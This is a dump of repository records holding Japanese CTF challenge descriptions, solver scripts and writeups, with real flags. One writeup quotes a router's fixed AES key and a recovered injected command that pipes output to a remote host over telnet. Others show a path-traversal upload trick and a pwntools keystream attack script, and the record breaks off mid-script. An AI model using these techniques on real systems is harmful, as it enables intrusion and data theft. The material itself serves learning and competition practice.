',\n\t\t\t\t\"/\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'A',\n\t\t\t\t\".-\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'B',\n\t\t\t\t\"-...\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'C',\n\t\t\t\t\"-.-.\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'D',\n\t\t\t\t\"-..\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'E',\n\t\t\t\t\".\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'F',\n\t\t\t\t\"..-.\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'G',\n\t\t\t\t\"--.\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'H',\n\t\t\t\t\"....\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'I',\n\t\t\t\t\"..\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'J',\n\t\t\t\t\".---\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'K',\n\t\t\t\t\"-.-\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'L',\n\t\t\t\t\".-..\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'M',\n\t\t\t\t\"--\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'N',\n\t\t\t\t\"-.\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'O',\n\t\t\t\t\"---\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'P',\n\t\t\t\t\".--.\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'Q',\n\t\t\t\t\"--.-\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'R',\n\t\t\t\t\".-.\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'S',\n\t\t\t\t\"...\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'T',\n\t\t\t\t\"-\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'U',\n\t\t\t\t\"..-\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'V',\n\t\t\t\t\"...-\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'W',\n\t\t\t\t\".--\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'X',\n\t\t\t\t\"-..-\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'Y',\n\t\t\t\t\"-.--\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'Z',\n\t\t\t\t\"--..\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'1',\n\t\t\t\t\".----\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'2',\n\t\t\t\t\"..---\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'3',\n\t\t\t\t\"...--\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'4',\n\t\t\t\t\"....-\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'5',\n\t\t\t\t\".....\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'6',\n\t\t\t\t\"-....\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'7',\n\t\t\t\t\"--...\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'8',\n\t\t\t\t\"---..\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'9',\n\t\t\t\t\"----.\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t'0',\n\t\t\t\t\"-----\"\n\t\t\t}\n\t\t};\n\t}\n}\n\nnamespace Dotty\n{\n\t// Token: 0x02000003 RID: 3\n\tinternal class Check\n\t{\n\t\t// Token: 0x04000003 RID: 3\n\t\tpublic static string check = \"-|....|.|/|..-.|.-..|.-|--.|/|..|...|/|---|.---|--.-|-..-|.|-.--|...--|..-|--|--..|.....|.--|..|--|.-..|.|.-..|.....|....-|-|.-|.....|-.-|--...|---|.-|--..|-|--.|..---|..---|--...|--.|-...|--..|..-.|-....|-.|.-..|--.-|.--.|.|--...|-|-....|.--.|--..|--...|.-..|.....|-|--.|-.-.|-.|-..|-...|--|--|...--|-..|.-|-.|.-..|.....|/|-...|.-|...|.|...--|..---\";\n\t}\n}\n```\n\n`check`を`mapper`から元に戻したところ、\n\n```\nTHE FLAG IS OJQXEY3UMZ5WIMLEL54TA5K7OAZTG227GBZF6NLQPE7T6PZ7L5TGCNDBMM3DANL5 BASE32\n```\n\nというメッセージが得られた。指示通りBase32デコードすると、フラグが得られた。\n\n```py\nimport base64\n\ncheck = \"-|....|.|/|..-.|.-..|.-|--.|/|..|...|/|---|.---|--.-|-..-|.|-.--|...--|..-|--|--..|.....|.--|..|--|.-..|.|.-..|.....|....-|-|.-|.....|-.-|--...|---|.-|--..|-|--.|..---|..---|--...|--.|-...|--..|..-.|-....|-.|.-..|--.-|.--.|.|--...|-|-....|.--.|--..|--...|.-..|.....|-|--.|-.-.|-.|-..|-...|--|--|...--|-..|.-|-.|.-..|.....|/|-...|.-|...|.|...--|..---\"\n\nd = { \n ' ': \"/\" ,\n\t\t'A': \".-\" ,\n\t\t'B': \"-...\" ,\n\t\t'C': \"-.-.\" ,\n\t\t'D': \"-..\" ,\n\t\t'E': \".\" ,\n\t\t'F': \"..-.\" ,\n\t\t'G': \"--.\" ,\n\t\t'H': \"....\" ,\n\t\t'I': \"..\" ,\n\t\t'J': \".---\" ,\n\t\t'K': \"-.-\" ,\n\t\t'L': \".-..\" ,\n\t\t'M': \"--\" ,\n\t\t'N': \"-.\" ,\n\t\t'O': \"---\" ,\n\t\t'P': \".--.\" ,\n\t\t'Q': \"--.-\" ,\n\t\t'R': \".-.\" ,\n\t\t'S': \"...\" ,\n\t\t'T': \"-\" ,\n\t\t'U': \"..-\" ,\n\t\t'V': \"...-\" ,\n\t\t'W': \".--\" ,\n\t\t'X': \"-..-\" ,\n\t\t'Y': \"-.--\" ,\n\t\t'Z': \"--..\" ,\n\t\t'1': \".----\" ,\n\t\t'2': \"..---\" ,\n\t\t'3': \"...--\" ,\n\t\t'4': \"....-\" ,\n\t\t'5': \".....\" ,\n\t\t'6': \"-....\" ,\n\t\t'7': \"--...\" ,\n\t\t'8': \"---..\" ,\n\t\t'9': \"----.\" ,\n\t\t'0': \"-----\"\n }\n\nd_swap = {v: k for k, v in d.items()}\n\nmsg = ''\nfor c in check.split('|'):\n msg += d_swap[c]\nprint(msg)\n# THE FLAG IS OJQXEY3UMZ5WIMLEL54TA5K7OAZTG227GBZF6NLQPE7T6PZ7L5TGCNDBMM3DANL5 BASE32\n\nflag = base64.b32decode('OJQXEY3UMZ5WIMLEL54TA5K7OAZTG227GBZF6NLQPE7T6PZ7L5TGCNDBMM3DANL5')\nprint(flag)\n```\n\n<!-- rarctf{d1d_y0u_p33k_0r_5py????_fa4ac605} -->\n" }, { "alpha_fraction": 0.6342412233352661, "alphanum_fraction": 0.8054474592208862, "avg_line_length": 50.599998474121094, "blob_id": "0ee23e5c3bfff7b3b9e6ca3c46e057c893716ee8", "content_id": "68ee670503da65e12d9797f67f4ad53163a6e3b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 257, "license_type": "no_license", "max_line_length": 122, "num_lines": 5, "path": "/2021/angstromCTF_2021/Keysar_v2/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Wow! Aplet sent me a message... he said he encrypted it with a key, but lost it. Gotta go though, I have biology homework!\n\n[Source Output](https://files.actf.co/8125825ae0a5c81fe0f3e4520b95c02937a4d6624929afec84e451366ede6552/out.txt)\n\nAuthor: EvilMuffinHa" }, { "alpha_fraction": 0.75789475440979, "alphanum_fraction": 0.7789473533630371, "avg_line_length": 25, "blob_id": "c2a297956cecde818c30d18e378cf25c2315d7e5", "content_id": "808c93f005b91d8823392384ab7e7fb94c73b8b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 285, "license_type": "no_license", "max_line_length": 81, "num_lines": 11, "path": "/2021/BCACTF_2.0/Its_All_Coming_Together/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Hey, someone wrote all these numbers on my computer! Can you check them out?\n\n[numbers.txt](https://objects.bcactf.com/bcactf2/continuedfractions1/numbers.txt)\n\nHint 1 of 2\n\nThey left a note! It says something about division?\n\nHint 2 of 2\n\nRemember to compensate for loss of precision." }, { "alpha_fraction": 0.5841924548149109, "alphanum_fraction": 0.6048110127449036, "avg_line_length": 18.46666717529297, "blob_id": "125dee34214c80cc83ca38bdba30a3edbc3d3444", "content_id": "a0130abad1ccd95f892df1925e8b80235ae78cd9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 291, "license_type": "no_license", "max_line_length": 74, "num_lines": 15, "path": "/2021/WaniCTF21-spring/Git_Master/docker-log.sh", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\nDOCKER=`which docker`\n\nif [ \"$#\" -ne 1 ]; then\n echo \"Usage: $0 IMAGE\"\n exit 0\nfi\n\nfor commit in $($DOCKER history $1 | sed 1d | awk '{ print $1 }')\ndo\n content=\"$commit\n$($DOCKER inspect $commit | tr -d '\\\"' | grep 'Created\\|Author\\|Comment')\"\n echo \"$content\"\ndone" }, { "alpha_fraction": 0.7094017267227173, "alphanum_fraction": 0.8034188151359558, "avg_line_length": 22.600000381469727, "blob_id": "3847e312f574b726dabb88400fa97e14fa856386", "content_id": "30f70fd196772e0ff153e6dd2544149f8ea3bc33", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 125, "license_type": "no_license", "max_line_length": 95, "num_lines": 5, "path": "/2021/WaniCTF21-spring/Easy/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "手始めに\n\n[cry-easy.zip](https://score.wanictf.org/storage/wps7tq2o7b538vemzgkjrp59e78pism0/cry-easy.zip)\n\nWriter : Laika" }, { "alpha_fraction": 0.6800000071525574, "alphanum_fraction": 0.6933333277702332, "avg_line_length": 12.727272987365723, "blob_id": "3b945178b9b66992ebdddda0556148d6c916cc0b", "content_id": "2363c909433742e52428420a6acee106ce8c5c51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 208, "license_type": "no_license", "max_line_length": 50, "num_lines": 11, "path": "/2021/ImaginaryCTF_2021/Chicken_Caesar_Salad/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のテキストが与えられる。\n\n```\nqkbn{ePmv_lQL_kIMamZ_kQxpMZa_oMb_aW_pIZl}\n```\n\nROT18したところ、フラグが得られた。\n\n<!-- ictf{wHen_dID_cAEseR_cIphERs_gEt_sO_hARd} -->" }, { "alpha_fraction": 0.740185558795929, "alphanum_fraction": 0.794432520866394, "avg_line_length": 38.94285583496094, "blob_id": "446ee2c2246d3220fa36c05d0db613131f2fee7c", "content_id": "2c0d4db9c0fb36bfdaa3f7635947d506344ddc9c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2159, "license_type": "no_license", "max_line_length": 401, "num_lines": 35, "path": "/2020/HITCON_CTF_2020/AC1750/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nタイトルが`AC1750`なので`AC1750 vulnerability`でGoogle検索するとルーターに関する脆弱性が見つかる。問題文にも`My router is weird`と書いてあるので、この脆弱性が関連しているだろうと推測。\n\n* https://www.thezdi.com/blog/2020/4/6/exploiting-the-tp-link-archer-c7-at-pwn2own-tokyo\n\n脆弱性はAES暗号化部分で、keyとして`TPONEMESH_Kf!xn?gj6pMAt-wBNV_TDP`、IVとして`1234567890abcdef1234567890abcdef`が固定でセットされている部分にあるらしい。\n\n> **Encrypting the Packet**\n>\n> As explained in the previous section, the packet is encrypted with AES with a fixed key of TPONEMESH_Kf!xn?gj6pMAt-wBNV_TDP. There are a few more missing pieces to this puzzle, though. The cipher is used in CBC mode and the IV is the fixed value 1234567890abcdef1234567890abcdef. Furthermore, despite having a 256-bit key and IV, the actual algorithm used is AES-CBC with a 128-bit key, so half of the key and IV are not used.\n\nまた、以下の記述から、与えられたパケットの中でもUDP通信に着目すれば良さそう。\n\n> The daemon communicates with the mobile application through the use of UDP packets with an encrypted payload.\n\nパケットキャプチャの中身を`Wireshark`で調べ、UDPのデータ部分に対して`CyberChef`を使ってAES Decryptしてみる。\n\n上記の脆弱性によれば、Keyの半分が使われていないと述べられているので後半部分を削り、`TPONEMESH_Kf!xn?`で復号化する。\n\nデータ部分が304バイトであるデータを復号したところ、以下のように読める文字が現れた。\n\n![](img/2020-11-29-02-10-52.png)\n\n赤線部分が怪しく、おそらく任意のコマンドを入力しているのだろうと思われる。\n\nこれをデータ部が304バイトであるUDPパケットについて行い、printfの後の文字をすべてつなげると\n\n```\n(ls -l&&echo hitcon{Why_can_one_place_be_injected_twice}>flag&&ls -l)|telnet 192.168.0.105 4321\n```\n\nとなる。(地道に手作業でやった。Wiresharkでデータ部分をまとめて抽出する方法が知りたい。)\n\n<!-- hitcon{Why_can_one_place_be_injected_twice} -->\n\n\n\n" }, { "alpha_fraction": 0.5733944773674011, "alphanum_fraction": 0.60550457239151, "avg_line_length": 17.16666603088379, "blob_id": "a57b41feac46f39d9956aed823566e522528337d", "content_id": "56d6bb0028eaf449cb4760d49a8e2cbc3b9d81b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 218, "license_type": "no_license", "max_line_length": 70, "num_lines": 12, "path": "/2020/Harekaze_mini_CTF_2020/rsa/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import math\nimport os\n\nexec(open(f'{os.path.dirname(__file__)}/distfiles/output.txt').read())\npe = c2+c3\n\np = math.gcd(pe,n)\nq = n // p\nd = pow(e,-1,(p-1)*(q-1))\nflag = pow(c1,d,n)\n\nprint(bytes.fromhex(hex(flag)[2:]))\n" }, { "alpha_fraction": 0.5529953837394714, "alphanum_fraction": 0.5898617506027222, "avg_line_length": 17.08333396911621, "blob_id": "ed0f399f619ba6ddf68b8cb615d75b9b9338f96e", "content_id": "9a36f0b82bda1654aad4c41cd89507cd4c924997", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 217, "license_type": "no_license", "max_line_length": 59, "num_lines": 12, "path": "/2021/dCTF_2021/This_one_is_really_basic/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import base64\nimport os\n\ntext = open(os.path.dirname(__file__)+\"/cipher.txt\").read()\ncnt = 1\n\nwhile True:\n text = base64.b64decode(text)\n if b'dctf{' in text:\n print(cnt, text)\n break\n cnt += 1\n" }, { "alpha_fraction": 0.8118811845779419, "alphanum_fraction": 0.8514851331710815, "avg_line_length": 21.55555534362793, "blob_id": "02ebe9f5e91bb2ce97447f21d12f3b9da165bd9c", "content_id": "312116e446f919197ce9537763af6785c16c9e55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 380, "license_type": "no_license", "max_line_length": 55, "num_lines": 9, "path": "/2020/WaniCTF/striped_table/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "テーブルの行の背景色をストライプにする作業をしてもらったら、こんなことになってしまいました!\n\nページにjavascriptalert(19640503)を埋め込み実行させるとフラグが得られます。\n\nhttps://striped.wanictf.org/?source にアクセスするとソースが閲覧できます。\n\nhttps://striped.wanictf.org\n\nWriter : suuhito" }, { "alpha_fraction": 0.8026315569877625, "alphanum_fraction": 0.8092105388641357, "avg_line_length": 49.66666793823242, "blob_id": "746c40d2c236f490b66fc52f3c1131af0efdd6e2", "content_id": "aebdcf52cde5831696dc039d14d6061b81eb8a49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 152, "license_type": "no_license", "max_line_length": 84, "num_lines": 3, "path": "/2021/dCTF_2021/Very_secure_website/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Some students have built their most secure website ever. Can you spot their mistake?\n\nhttp://dctf1-chall-very-secure-site.westeurope.azurecontainer.io/\n" }, { "alpha_fraction": 0.7507331371307373, "alphanum_fraction": 0.7653958797454834, "avg_line_length": 30.090909957885742, "blob_id": "16d94fabd45bc1c12f81917c2e543bfe61802e84", "content_id": "7f7d13dadeac97df50495d8d4fa37271176a37b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 341, "license_type": "no_license", "max_line_length": 160, "num_lines": 11, "path": "/2021/BCACTF_2.0/Sailing_Thru_Decryption/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I seem to have lost something while I was sailing to France. I know it was one of my pets, but I can't seem to remember his name. Could you help me remember it?\n\n[image.png](https://objects.bcactf.com/bcactf2/sailingthrudecryption/image.png)\n\nHint 1 of 2\n\nI wonder how the Navy encrypts their signals?\n\nHint 2 of 2\n\nNothing beats the French!" }, { "alpha_fraction": 0.7096773982048035, "alphanum_fraction": 0.7903226017951965, "avg_line_length": 14.75, "blob_id": "679b0cbdc885e81db272c30e86110c249a7b9097", "content_id": "044360b0d164b4e33cd1ff8b96b1ca02a65cb3d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 94, "license_type": "no_license", "max_line_length": 26, "num_lines": 4, "path": "/2020/WaniCTF/Basic_RSA/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "RSA暗号の基本的な演算ができますか?\n`nc rsa.wanictf.org 50000`\n\nWriter : Laika" }, { "alpha_fraction": 0.5245901346206665, "alphanum_fraction": 0.5282331705093384, "avg_line_length": 19.33333396911621, "blob_id": "35c43e129228ce026ad13d4fdf220864597f2326", "content_id": "91f29d80ba99805dcb577a3466695ea43eecca77", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 549, "license_type": "no_license", "max_line_length": 51, "num_lines": 27, "path": "/2021/WaniCTF21-spring/Easy/cry-easy/encrypt.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "with open(\"flag.txt\") as f:\n flag = f.read().strip()\n\n\nA = REDACTED\nB = REDACTED\n\nplaintext_space = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ_{}\"\n\nassert all(x in plaintext_space for x in flag)\n\n\ndef encrypt(plaintext: str, a: int, b: int) -> str:\n ciphertext = \"\"\n for x in plaintext:\n if \"A\" <= x <= \"Z\":\n x = ord(x) - ord(\"A\")\n x = (a * x + b) % 26\n x = chr(x + ord(\"A\"))\n ciphertext += x\n\n return ciphertext\n\n\nif __name__ == \"__main__\":\n ciphertext = encrypt(flag, a=A, b=B)\n print(ciphertext)\n" }, { "alpha_fraction": 0.5996302962303162, "alphanum_fraction": 0.6195933222770691, "avg_line_length": 19.648855209350586, "blob_id": "c9de71d32c3744b8955fa211551df6cb25b3c9e8", "content_id": "4d5b4f1dca9bb4e947ec834b514b64a4d33d51ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3009, "license_type": "no_license", "max_line_length": 88, "num_lines": 131, "path": "/2021/RaRCTF_2021/Secure_Uploader/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nWebページのソースコードが与えられる。\n\nアップロードしたファイルを表示することができるようになっている。\n\n```py\nfrom flask import Flask, request, redirect, g\nimport sqlite3\nimport os\nimport uuid\n\napp = Flask(__name__)\n\nSCHEMA = \"\"\"CREATE TABLE files (\nid text primary key,\npath text\n);\n\"\"\"\n\n\ndef db():\n g_db = getattr(g, '_database', None)\n if g_db is None:\n g_db = g._database = sqlite3.connect(\"database.db\")\n return g_db\n\n\[email protected]_first_request\ndef setup():\n os.remove(\"database.db\")\n cur = db().cursor()\n cur.executescript(SCHEMA)\n\n\[email protected]('/')\ndef hello_world():\n return \"\"\"<!DOCTYPE html>\n<html>\n<body>\n<form action=\"/upload\" method=\"post\" enctype=\"multipart/form-data\">\n Select image to upload:\n <input type=\"file\" name=\"file\">\n <input type=\"submit\" value=\"Upload File\" name=\"submit\">\n</form>\n\n</body>\n</html>\"\"\"\n\n\[email protected]('/upload', methods=['POST'])\ndef upload():\n if 'file' not in request.files:\n return redirect('/')\n file = request.files['file']\n if \".\" in file.filename:\n return \"Bad filename!\", 403\n conn = db()\n cur = conn.cursor()\n uid = uuid.uuid4().hex\n try:\n cur.execute(\"insert into files (id, path) values (?, ?)\", (uid, file.filename,))\n except sqlite3.IntegrityError:\n return \"Duplicate file\"\n conn.commit()\n file.save('uploads/' + file.filename)\n return redirect('/file/' + uid)\n\[email protected]('/file/<id>')\ndef file(id):\n conn = db()\n cur = conn.cursor()\n cur.execute(\"select path from files where id=?\", (id,))\n res = cur.fetchone()\n if res is None:\n return \"File not found\", 404\n with open(os.path.join(\"uploads/\", res[0]), \"r\") as f:\n return f.read()\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n```\n\nまた、Dockerfileを見るとフラグは`/flag`下にあることが分かる。\n\n```\nFROM python:3-alpine\nRUN pip install --no-cache-dir flask gunicorn\n\nRUN addgroup -S ctf && adduser -S ctf -G ctf\n\nCOPY app /app\nCOPY flag.txt /flag\nWORKDIR /app\n\nRUN chown -R ctf:ctf /app && chmod -R 770 /app\nRUN chown -R root:ctf /app && \\\n chmod -R 770 /app\n\nUSER ctf\nENTRYPOINT [\"/app/start.sh\"]\n```\n\nファイル表示部分を読むと、ファイルの読み出しは`filename`指定であることが分かるので、Directory Traversalを行ってみた。\n\n```py\[email protected]('/file/<id>')\ndef file(id):\n conn = db()\n cur = conn.cursor()\n cur.execute(\"select path from files where id=?\", (id,))\n res = cur.fetchone()\n if res is None:\n return \"File not found\", 404\n with open(os.path.join(\"uploads/\", res[0]), \"r\") as f:\n return f.read()\n```\n\nPOSTリクエストのfilenameを改ざんして`/flag`にする。\n\n![](img/2021-08-09-17-57-57.png)\n\n\nすると、pathが`/flag`と解釈され、フラグが表示された。\n\n```\n>>> import os; os.path.join(\"uploads/\", \"/flag\")\n'/flag'\n```\n\n<!-- rarctf{4lw4y5_r34d_th3_d0c5_pr0p3rly!-71ed16} -->\n" }, { "alpha_fraction": 0.7866324186325073, "alphanum_fraction": 0.8046272397041321, "avg_line_length": 77, "blob_id": "c786d83807c9b272cf2396571126ba56bd0fa2b0", "content_id": "981e732599dc1c630f6dc7e84ee6e90d798b5e6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 389, "license_type": "no_license", "max_line_length": 258, "num_lines": 5, "path": "/2020/pbctf_2020/GCombo/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "One day I spied out my friend accessing some google form to enter his secret combination lock. Afterwards, I kept bothering him about it, and he finally decided to give the link to me. Maybe you can figure out his combo for me and get a tasty flag in return:\n\n[link](https://docs.google.com/forms/d/e/1FAIpQLSe7sOTLHmGjmUY3iE6E7QLqeYAZDfQXsiJrz8r-ZcA_4cXNFQ/viewform)\n\nBy: theKidOfArcrania" }, { "alpha_fraction": 0.6626505851745605, "alphanum_fraction": 0.7228915691375732, "avg_line_length": 15.800000190734863, "blob_id": "8c20aff3d65bfe582b1320a148c8b70f57cefce2", "content_id": "2b61e920e90f1ecac47438028b8b02f1a174671a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 83, "license_type": "no_license", "max_line_length": 37, "num_lines": 5, "path": "/2021/RITSEC_CTF_2021/Blob/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Ha. Blob. Did you get the reference?\n\nhttp://git.ritsec.club:7000/blob.git/\n\n~knif3" }, { "alpha_fraction": 0.6321839094161987, "alphanum_fraction": 0.6896551847457886, "avg_line_length": 13.5, "blob_id": "5d3cd08f8de2f37c512b21b395ee15b2592d1cb4", "content_id": "bc94a4af57036c6958c146f919b653b59fbcdc8b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 87, "license_type": "no_license", "max_line_length": 35, "num_lines": 6, "path": "/2021/HeroCTF_v3/0xSSRF/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Get the flag !\n\nURL : http://chall1.heroctf.fr:3000\n\nFormat : Hero{}\nAuthor : xanhacks\n" }, { "alpha_fraction": 0.5806328654289246, "alphanum_fraction": 0.6382005214691162, "avg_line_length": 28.307262420654297, "blob_id": "9d7fd72d8920d6f63f84c29d3322a7986a8935f5", "content_id": "0f9f7a520aea48b819d7d1fb02cf1e6612612a6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5602, "license_type": "no_license", "max_line_length": 106, "num_lines": 179, "path": "/2021/BCACTF_2.0/FNES_1/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のプログラムが与えられる。\n\n```py\n#!/usr/bin/env python3\nimport random\nimport math\nimport time\nimport binascii\nfrom Crypto.Cipher import ARC4\nfrom Crypto.Hash import SHA\n\n\nwith open(\"flag.txt\", \"r\") as f:\n flag = f.read().strip().encode(\"ascii\")\n\nwith open(\"key.txt\", \"r\") as f:\n key = int(f.read().strip())\n\ntarget_query = \"Open sesame... Flag please!\"\n\nprint(\"\"\"\nWelcome to your Friendly Neighborhood Encryption Service (FNES)!\nIf you and a friend both run this service at the same time,\nyou should be able to send messages to each other!\nHere are the steps:\n1. Friends A and B connect to the server at the same time (you have about a five second margin)\n2. Friend A encodes a message and sends it to Friend B\n3. Friend B decodes the message, encodes their reply, and sends it to Friend A\n4. Friend A decodes the reply, rinse and repeat\nMake sure to not make any mistakes, though, or your keystreams might come out of sync...\nPS: For security reasons, there are four characters you aren't allowed to encrypt. Sorry!\n\"\"\", flush=True)\n\ntempkey = SHA.new(int(key + int(time.time() / 10)).to_bytes(64, 'big')).digest()[0:16]\ncipher = ARC4.new(tempkey)\n\nwhile True:\n print(\"Would you like to encrypt (E), decrypt (D), or quit (Q)?\", flush=True)\n l = input(\">>> \").strip().upper()\n if (len(l) > 1):\n print(\"You inputted more than one character...\", flush=True)\n elif (l == \"Q\"):\n print(\"We hope you enjoyed!\", flush=True)\n exit()\n elif (l == \"E\"):\n print(\"What would you like to encrypt?\", flush=True)\n I = input(\">>> \").strip()\n if (set(I.lower()) & set(\"flg!\")): # You're not allowed to encrypt any of the characters in \"flg!\"\n print(\"You're never getting my flag!\", flush=True)\n exit()\n else:\n print(\"Here's your message:\", flush=True)\n c = str(binascii.hexlify(cipher.encrypt(str.encode(I))))[2:-1]\n print(c, flush=True)\n elif (l == \"D\"):\n print(\"What was the message?\", flush=True)\n I = input(\">>> \").strip()\n m = str(cipher.decrypt(binascii.unhexlify(I)))[2:-1]\n if (m == target_query):\n print(\"Passphrase accepted. Here's your flag:\", flush=True)\n print(str(flag)[2:-1], flush=True)\n exit()\n else:\n print(\"Here's the decoded message:\", flush=True)\n print(m, flush=True)\n```\n\ndecryptした結果が`\"Open sesame... Flag please!\"`となるような暗号文を与えれば良い。\n\n```py\ntarget_query = \"Open sesame... Flag please!\"\n\n m = str(cipher.decrypt(binascii.unhexlify(I)))[2:-1]\n if (m == target_query):\n print(\"Passphrase accepted. Here's your flag:\", flush=True)\n print(str(flag)[2:-1], flush=True)\n exit()\n```\n\nただし、`flg!`が入った文字列は暗号化してもらえない。\n\n```py\n print(\"What would you like to encrypt?\", flush=True)\n I = input(\">>> \").strip()\n if (set(I.lower()) & set(\"flg!\")): # You're not allowed to encrypt any of the characters in \"flg!\"\n print(\"You're never getting my flag!\", flush=True)\n exit()\n```\n\nまた、`key`が分からないので、同じ`tempkey`を使って再現するのは無理そう。\n\n```py\nwith open(\"key.txt\", \"r\") as f:\n key = int(f.read().strip())\n\ntempkey = SHA.new(int(key + int(time.time() / 10)).to_bytes(64, 'big')).digest()[0:16]\ncipher = ARC4.new(tempkey)\n```\n\n平文と暗号文に規則性はないか確かめるために、試しに`\\x00\\x00....` と `\\x01\\x01...` を暗号化してみる。\n\n```py\nfrom pwn import *\ncontext.log_level = 'error'\n\ntarget_query = \"Open sesame... Flag please!\"\n\nio = remote('crypto.bcactf.com', '49153')\nio.recvuntil('Would you like to encrypt (E), decrypt (D), or quit (Q)?')\nio.sendline('E')\nio.recvuntil('>>> ')\nc = '\\x00' * len(target_query)\nio.sendline(c)\nio.recvuntil(\"Here's your message:\\n\")\nmsg = io.recvline().strip().decode('utf-8')\nprint(msg)\n\nio = remote('crypto.bcactf.com', '49153')\nio.recvuntil('Would you like to encrypt (E), decrypt (D), or quit (Q)?')\nio.sendline('E')\nio.recvuntil('>>> ')\nc = '\\x01' * len(target_query)\nio.sendline(c)\nio.recvuntil(\"Here's your message:\\n\")\nmsg = io.recvline().strip().decode('utf-8')\nprint(msg)\n```\n\n上記プログラムを実行したところ、以下の結果が得られた。\n\n```\n51d8cc259ef9571e849162d35e4d61b54b12213b77242780d6a3f1\n50d9cd249ff8561f859063d25f4c60b44a13203a76252681d7a2f0\n```\n\n`C(\\x00\\x00...)` XOR `0101...` = `C(\\x01\\x01...)` となることが分かった。\n\n```\n51d8cc259ef9571e849162d35e4d61b54b12213b77242780d6a3f1\nXOR\n010101010101010101010101010101010101010101010101010101\n=\n50d9cd249ff8561f859063d25f4c60b44a13203a76252681d7a2f0\n```\n\nよって、`C(\\x00\\x00...)` XOR `target_query#hex` を計算すれば `C(target_query)` が得られる。\n\n```py\nfrom pwn import *\ncontext.log_level = 'error'\n\ntarget_query = \"Open sesame... Flag please!\"\n\n# 1\nio = remote('crypto.bcactf.com', '49153')\nio.recvuntil('Would you like to encrypt (E), decrypt (D), or quit (Q)?')\nio.sendline('E')\nio.recvuntil('>>> ')\nc = '\\x00' * 